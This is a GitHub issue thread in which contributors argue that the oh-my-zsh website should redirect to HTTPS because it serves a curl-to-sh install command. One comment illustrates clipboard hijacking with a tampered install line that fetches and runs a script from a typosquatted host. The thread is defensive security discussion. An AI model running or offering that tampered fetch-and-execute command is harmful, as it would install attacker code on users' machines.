### ISSUE TITLE
Move http://ohmyz.sh to https

### ISSUE THREAD

**Issue by ahmetb** [robbyrussell/oh-my-zsh#5912]
This website is serving a curl|sh command and probably better off served over TLS with HSTS/cert pinning.

**Comment by snood1205** [comment]
This site has nothing, to the best of my belief, that would require SSL. There is no log in, so password entry is not an issue, and there is no payment handling, so credit card entry is not an issue. HTTPS is a useful protocol, but I don't really see the advantage here.

**Comment by ahmetalpbalkan** [comment]
@snood1205 I am afraid that's not right. Let's say I'm in country X which sniffs connections to this website. I go copy the line:

    $ sh -c "$(curl -fsSL https://raw.github.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"

but it actually gets copied as:

    $ sh -c "$(curl -fsSL https://raw.g17hub.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"

with Javascript clipboard hijacking (demo: https://security.love/Pastejacking/)

Then I go ahead and paste this to my terminal to install some really good malware on my machine. 😄 

It's a real attack vector.

**Comment by landsman** [comment]
HTTPS is needed everywhere.
It's not just about passwords etc. Good presentation about this topic has @spaze.

We can use let's encrypt easily!

**Comment by mcornella** [comment]
It actually is enabled to be served via https, it's just not redirected if coming from the http site. Thanks for your input, I'll let Robby know.

**Comment by ahmetb** [comment]
I'd keep this open until fixed. :)

**Comment by mcornella** [comment]
It's fixed now. Thanks for your help!
